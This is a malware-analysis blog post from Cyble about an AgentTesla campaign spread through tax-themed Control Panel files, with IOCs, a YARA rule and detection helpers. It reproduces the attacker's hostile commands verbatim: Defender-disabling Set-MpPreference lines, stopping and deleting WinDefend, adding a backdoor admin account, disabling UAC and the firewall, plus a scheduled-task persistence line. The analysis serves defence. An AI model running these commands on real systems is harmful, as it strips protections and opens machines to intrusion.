Cyble – AgentTesla Malware Targets Users With Malicious Control Panel File

Key Takeaways

  • The blog highlights a new infection chain for distributing the AgentTesla RAT. It involves a spam email carrying a CPL file that, when executed, downloads a PowerShell script that injects AgentTesla into RegSvcs.exe and MSBuild.exe.
  • The PowerShell scripts use obfuscated binary strings to hide malicious code.
  • For persistence, malicious VBScripts are dropped into the Startup folder, and a new scheduled task is created.
  • A .NET-based loader is used to inject the AgentTesla payload into memory.

Executive Summary

Cyble Research and Intelligence Labs (CRIL) recently observed an AgentTesla malware attack that uses a well-developed, multi-stage process. The campaign is designed to trick unsuspecting users into opening tax-related documents and the accompanying Control Panel (CPL) files.

The adversary leverages malicious CPL files to execute malicious PowerShell scripts and uses a custom obfuscated .NET loader to inject the AgentTesla payload.

During the investigation, we discovered a malicious email with the subject “Gorgees Ghada shared ‘Gorgees_Ghada_Tax_2021-2022.zip’ with you”. The email carries an archive attachment containing two files, a PDF and a CPL file, named Gorgees_Ghada_Tax 2021.pdf and Gorgees_Ghada_Tax 2021.cpl.

This CPL file executes a PowerShell script to download another file from the URL hxxp://cawp1[.]blogspot[.]com/atom.xml. This newly downloaded file contains a .NET loader injecting AgentTesla remote access trojan (RAT) into system processes.

The figure below shows the spam email.

Figure 1 – Spam Email

AgentTesla is a .NET-based information stealer that infiltrates computers and exfiltrates sensitive information. Its main focus is the credentials and personal information of victims. Additionally, AgentTesla has capabilities such as keylogging, stealing clipboard data, file system access, and data exfiltration to the Command and Control (C&C) server.

Technical Details

The attack lifecycle comprises several distinct stages, each serving a specific purpose to achieve its goals. These stages encompass various techniques and methodologies to facilitate initial infection, establish persistence on the targeted system, evade detection by security measures, and employ process injection for further advancements.

The figure below shows the AgentTesla infection chain.

Figure 2 – AgentTesla Infection Chain

Initial Infection

The email attachment contains a malicious CPL file named Gorgees_Ghada_Tax 2021.cpl. The SHA256 hash of this file is 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303.

During our analysis, merely three security vendors successfully detected this malicious file, as shown in the figure below.

Figure 3 – Anti Virus Vendor Detection for Malicious CPL File

The Gorgees_Ghada_Tax 2021.cpl file operates similarly to regular executables, requiring only a double-click to initiate its execution. Within this file lies PowerShell code, responsible for fetching a malicious PowerShell script from a hardcoded URL cawp1[.]blogspot[.]com/atom.xml and subsequently executing it through the use of powershell.exe.

The figure below shows the code for downloading and executing the script.

Figure 4 – PowerShell Code Executed by CPL

The downloaded PowerShell script contains several obfuscated binary strings. Various binary substrings are replaced with special characters such as ‘*’ and ‘_’ for obfuscation. Once the script is executed, PowerShell deobfuscates them by replacing the special characters with their original binary substrings, revealing the actual content of the binary strings. These deobfuscated binary strings are then converted into additional PowerShell scripts, an executable, and a DLL file.

The figure below shows the downloaded malicious script.

Figure 5 – PowerShell Script Downloaded by the CPL File

After being executed, the malicious PowerShell script drops three scripts into the C:\ProgramData\phuddiupdate directory: AdobeUpdates.vbs, Clang.vbs, and Se**logy.!!!!!!!!!!!!!!!!. These scripts carry out a series of malicious actions, which are elaborated on in the subsequent sections.

The figure below shows the files dropped by the malicious PowerShell script.

Figure 6 – Scripts Dropped by the Malicious PowerShell Script

Payload Injection

Within the script “Se**logy.!!!!!!!!!!!!!!!!”, two binary string variables, namely “BigBOSS” and “s**ybunbun”, are concealed through obfuscation. The variable BigBOSS corresponds to an obfuscated AgentTesla executable, while the variable “s**ybunbun” conceals yet another obfuscated PowerShell script.

The figure below shows the contents of the “Se**logy.!!!!!!!!!!!!!!!!” file.

Figure 7 – Contents of the Dropped Se**logy.~!!!!!!!!!!!!!!!!~ File

Subsequently, the PowerShell script undertakes a deobfuscation process on the string variable “s**ybunbun” and executes the underlying PowerShell script. This deobfuscated script includes a loader DLL file based on .NET, which is once again concealed in binary string format. The script performs deobfuscation on the binary string, subsequently converting it into a byte array to get the actual loader.

The figure below shows the script code that creates a byte array from the binary string.

Figure 8 – Script to Deobfuscate .NET Loader
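As an added analysis helper (not code from the campaign or from Cyble), the block below undoes the kind of character-for-bit-run substitution described above, turns the restored binary string into bytes, and triages whether the result is a PE image (the loader DLL or the AgentTesla executable) or a further text script. The substitution table is an assumption; the real one is visible only in the figures.

```python
# Assumed substitution table (constructed for this example): the script
# stands single characters in for runs of bits, e.g. '*' for "0000".
SUBSTITUTIONS = {"*": "0000", "_": "1111"}


def restore_binary(blob: str, table: dict = SUBSTITUTIONS) -> str:
    """Undo the substitution and return a clean string of '0'/'1' bits."""
    bits = []
    for ch in blob:
        if ch in table:
            bits.append(table[ch])
        elif ch in "01":
            bits.append(ch)
        elif not ch.isspace():          # anything else means a wrong table
            raise ValueError(f"unexpected character {ch!r} in blob")
    out = "".join(bits)
    if len(out) % 8:
        raise ValueError(f"{len(out)} bits is not a whole number of bytes")
    return out


def binary_to_bytes(bits: str) -> bytes:
    """Eight bits at a time, most significant bit first."""
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def classify(payload: bytes) -> str:
    """Rough triage of a decoded stage: PE image or text script."""
    if payload[:2] == b"MZ":
        return "pe"                      # exe or DLL (loader / AgentTesla)
    if all(32 <= b < 127 or b in (9, 10, 13) for b in payload):
        return "script"                  # a further PowerShell stage
    return "unknown"


def decode_stage(blob: str) -> tuple:
    """Full pipeline: obfuscated blob -> (kind, raw bytes)."""
    payload = binary_to_bytes(restore_binary(blob))
    return classify(payload), payload


def obfuscate_for_demo(data: bytes, table: dict = SUBSTITUTIONS) -> str:
    """Build a blob the same way, only to produce constructed test input."""
    bits = "".join(f"{b:08b}" for b in data)
    for ch, run in table.items():
        bits = bits.replace(run, ch)
    return bits
```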

Once the .NET loader binary has been reconstructed, the script calls a designated method, C, in class B of namespace A within the loader.

The figure below shows the method C of the .NET Loader DLL file.

Figure 9 – Method C of .NET Loader DLL

This DLL then performs the process injection, injecting the AgentTesla executable into three distinct executables under C:\Windows\Microsoft.NET\Framework: v4.0.30319\RegSvcs.exe, v2.0.50727\RegSvcs.exe, and v3.5\Msbuild.exe.

This process injection is accomplished by utilizing the Invoke method within the script, as shown below.

Figure 10 – Script Performing Process Injection

The ultimate injected payload is a 32-bit variant of the AgentTesla malware, with a SHA256 hash of 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e.

Persistence

The malware employs both scheduled tasks and the Startup folder to establish persistence. The downloaded PowerShell script contains the following command:

schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr "$KILKGGKGK C:\ProgramData\phuddiupdate\AdobeUpdates.vbs"

This command creates a scheduled task entry in the Task Scheduler. The entry specifies that the script AdobeUpdates.vbs located in C:\ProgramData\phuddiupdate will be executed on a daily basis without a specific end date.

The figure below shows the task scheduler entry.

Figure 11 – Task Scheduler Entry for Persistence

Furthermore, to strengthen its persistence, the PowerShell script drops two scripts, AdobeUpdates.vbs and Clang.vbs, into the system’s Startup folder. The Startup folder is scanned when the operating system starts, and any files within it are executed as part of the initialization process.

The figure below shows the start-up folder.

Figure 12 – Startup Entry for Persistence

Both scripts, AdobeUpdates.vbs and Clang.vbs, share common code and differ only in their download URLs. Each encapsulates a PowerShell command for execution: the VBScripts contain a PowerShell command that downloads the malicious payload from the hardcoded URL every time the system starts or at the time set in the scheduled task entry.

The figure below shows the complete code of the AdobeUpdates.vbs.

Figure 13 – Contents of the AdobeUpdates.vbs Script

Defense Evasion

In order to evade detection mechanisms, the initial PowerShell script utilizes an encoded binary string variable named AMSISSISISI. Within this variable, two binary strings are embedded, accompanied by code that stops the Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).

The figure below shows the deobfuscated string AMSISSISISI.

Figure 14 – Script to Disable Windows Defender

The variable AMI is an AMSI bypass script that tries to disable AMSI’s “amsiInitFailed” check by manipulating non-public, static fields in the “System.Management.Automation.AmsiUtils” class.

The figure below shows the PowerShell command used to bypass AMSI.

Figure 15 – PowerShell for AMSI Bypass

Another variable, DEF, holds a PowerShell script that manipulates Windows Defender settings. The script adds exclusions for extensions, paths, processes, and an IP address, and changes other Windows Defender settings.

Excluded Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js.

Excluded Paths: C:\, D:\, and E:\.

Excluded Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus and wscript.exe.

The script modifies the following Windows Defender settings to impair defenses:

  • Add-MpPreference -ExclusionIpAddress 127.0.0.1
  • Add-MpPreference -ThreatIDDefaultAction_Actions 6
  • Add-MpPreference -AttackSurfaceReductionRules_Ids 0
  • Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  • Set-MpPreference -EnableControlledFolderAccess Disabled
  • Set-MpPreference -PUAProtection disable
  • Set-MpPreference -HighThreatDefaultAction 6 -Force
  • Set-MpPreference -ModerateThreatDefaultAction 6
  • Set-MpPreference -LowThreatDefaultAction 6
  • Set-MpPreference -SevereThreatDefaultAction 6
  • Set-MpPreference -ScanScheduleDay 8

Additionally, the script executes the following commands.

Command | Description
New-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force | Disables User Account Control (UAC) on the system.
Stop-Service -Name WinDefend -Confirm:$false -Force | Forcefully stops the Windows Defender service without asking for confirmation and without waiting for dependent services or tasks to finish.
Set-Service -Name WinDefend -StartupType Disabled | Prevents the WinDefend service from starting automatically when the system boots.
net user System32 /add | Creates a new local user account named “System32”.
net user System32 123 | Sets the password of the “System32” account to “123”.
net localgroup administrators System32 /add | Adds “System32” to the local Administrators group.
net localgroup "Remote Desktop Users" System32 /add | Adds “System32” to the local “Remote Desktop Users” group.
net stop WdNisSvc | Stops the Windows Defender Network Inspection Service (WdNisSvc).
sc delete windefend | Permanently deletes the “windefend” service.
netsh advfirewall set allprofiles state off | Turns off the Windows Firewall for all network profiles on the system.

The figure below shows the script to impair defense.

Figure 16 – Script Code to Manipulate Windows Defender Settings
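The same tampering can be hunted for in collected PowerShell command lines. The block below is an added example (not Cyble's code): it parses Set-/Add-MpPreference invocations like those listed above into parameters and flags the ones that weaken Defender; the policy table is my own selection of the settings this campaign touches.

```python
import re
import shlex

# Settings whose listed value weakens Defender (keys lowercased for lookup).
# Selection constructed from the commands the campaign runs.
TAMPER_POLICY = {
    "disablerealtimemonitoring": lambda v: v.lower() == "$true",
    "disablescriptscanning": lambda v: v.lower() == "$true",
    "disableioavprotection": lambda v: v.lower() == "$true",
    "disableintrusionpreventionsystem": lambda v: v.lower() == "$true",
    "enablecontrolledfolderaccess": lambda v: v.lower() == "disabled",
    "mapsreporting": lambda v: v.lower() == "disabled",
    "submitsamplesconsent": lambda v: v.lower() == "neversend",
    "puaprotection": lambda v: v.lower().startswith("disable"),
}
# Any exclusion, and any *Threat*DefaultAction set to 6 (Allow), is suspicious.
EXCLUSION = re.compile(r"^exclusion", re.I)
DEFAULT_ACTION = re.compile(r"threat\w*defaultaction", re.I)


def parse_mppreference(cmd: str) -> dict:
    """Return {ParamName: value} for a Set-/Add-MpPreference command line.
    Bare switches such as -Force get the value "$true"."""
    tokens = shlex.split(cmd)
    if not tokens or tokens[0].lower() not in ("set-mppreference", "add-mppreference"):
        return {}
    params, i = {}, 1
    while i < len(tokens):
        name = tokens[i].lstrip("-")
        if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            params[name] = tokens[i + 1]
            i += 2
        else:
            params[name] = "$true"
            i += 1
    return params


def find_tampering(cmd: str) -> list:
    """List 'Param=value' strings for every weakening setting in cmd."""
    hits = []
    for name, value in parse_mppreference(cmd).items():
        weak = TAMPER_POLICY.get(name.lower())
        if (EXCLUSION.match(name)
                or (DEFAULT_ACTION.search(name) and value == "6")
                or (weak and weak(value))):
            hits.append(f"{name}={value}")
    return hits
```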

The figure below shows the process tree of the AgentTesla Infection.

Figure 17 – AgentTesla Process Tree

Conclusion

The observed malware campaign demonstrates a sophisticated and multi-stage attack strategy. By disguising malicious content as a seemingly legitimate program, the adversaries aim to lure unsuspecting users into activating weaponized control panel files that execute PowerShell scripts and load the dangerous AgentTesla malware. The successful infiltration of AgentTesla allows attackers to conduct data theft and execute commands on compromised systems, posing significant security risks. Vigilance and robust security measures are imperative to combat this threat.

Our Recommendations

  • Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.
  • Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.

MITRE ATT&CK® Techniques

Tactic | Technique ID | Technique Name
Initial Access | T1566 | Phishing
Execution | T1059 | Command and Scripting Interpreter
Execution | T1204 | User Execution
Persistence | T1547.001 | Startup Folder
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools
Defense Evasion | T1562.004 | Impair Defenses: Disable or Modify System Firewall
Defense Evasion | T1562.006 | Impair Defenses: Indicator Blocking
Defense Evasion | T1562.007 | Impair Defenses: Disable or Modify Cloud Firewall
Command and Control | T1071 | Application Layer Protocol

Indicators of Compromise (IOCs)


YARA Rules

rule AgentTesla_CPL_Downloader
{
    meta:
        author = "Cyble"
        description = "Detects AgentTesla CPL Downloader Files"
        date = "2023-08-08"
        os = "Windows"
        threat_name = "AgentTesla"
        severity = 100
        reference_sample = "72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303"

    strings:
        $a = "blogspot.com/atom.xml'"
        $b = "-ExecutionPolicy Bypass -c \"%s\""
        $c = "('{1}{0}'-f'calc','i').replace('calc','eX')"

    condition:
        all of them
}

Detection Guidance:

Because this campaign downloads malicious PowerShell code from a URL matching the “blogspot.com/atom.xml” pattern, we recommend a security rule that blocks execution of powershell.exe when both the strings “blogspot.com/atom.xml'” and “.replace('calc','eX')” are present in the PowerShell command line. The rule should apply only when the powershell.exe process was spawned by rundll32.exe, with that rundll32.exe process itself launched by control.exe.
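A prototype of this guidance as process-event logic, added here as an example (not Cyble's rule or any vendor's syntax): the event shape, with the image path, command line and an ancestor list nearest-parent-first, is an assumption to be mapped onto your EDR's fields, and the sample events are constructed with the script body redacted so only the two marker strings remain.

```python
from dataclasses import dataclass

# Both marker strings must be present (compared case-insensitively).
REQUIRED_STRINGS = ("blogspot.com/atom.xml'", ".replace('calc','ex')")
# Required ancestry: powershell.exe <- rundll32.exe <- control.exe
REQUIRED_CHAIN = ("rundll32.exe", "control.exe")


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str
    ancestors: list     # image paths, nearest parent first


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matches_guidance(ev: ProcessEvent) -> bool:
    """True only when image, command line and the two-level parent chain all fit."""
    if _basename(ev.image) != "powershell.exe":
        return False
    cl = ev.command_line.lower()
    if not all(marker in cl for marker in REQUIRED_STRINGS):
        return False
    return tuple(_basename(a) for a in ev.ancestors[:2]) == REQUIRED_CHAIN


# Constructed sample events; the script body is redacted, only the markers remain.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MARKED = "-ExecutionPolicy Bypass -c <redacted> blogspot.com/atom.xml' <redacted>.replace('calc','eX')"
SAMPLE_EVENTS = [
    ProcessEvent(POWERSHELL, MARKED,
                 [r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\control.exe"]),
    # same command line, but launched from Explorer: outside the guidance
    ProcessEvent(POWERSHELL, MARKED, [r"C:\Windows\explorer.exe"]),
    # right ancestry, benign command line
    ProcessEvent(POWERSHELL, "-c Get-Date",
                 [r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\control.exe"]),
]


def evaluate(events) -> list:
    """Indices of the events the rule would block."""
    return [i for i, ev in enumerate(events) if matches_guidance(ev)]


if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))   # [0]
```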


Disclaimer: The provided detection guidance rules are purely illustrative and should not be directly implemented in a production environment without proper testing, validation, and consideration of potential impacts on system performance and security. Always exercise caution when implementing security rules or policies, and ensure you fully understand the consequences of any changes made to your system or network.

Source: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/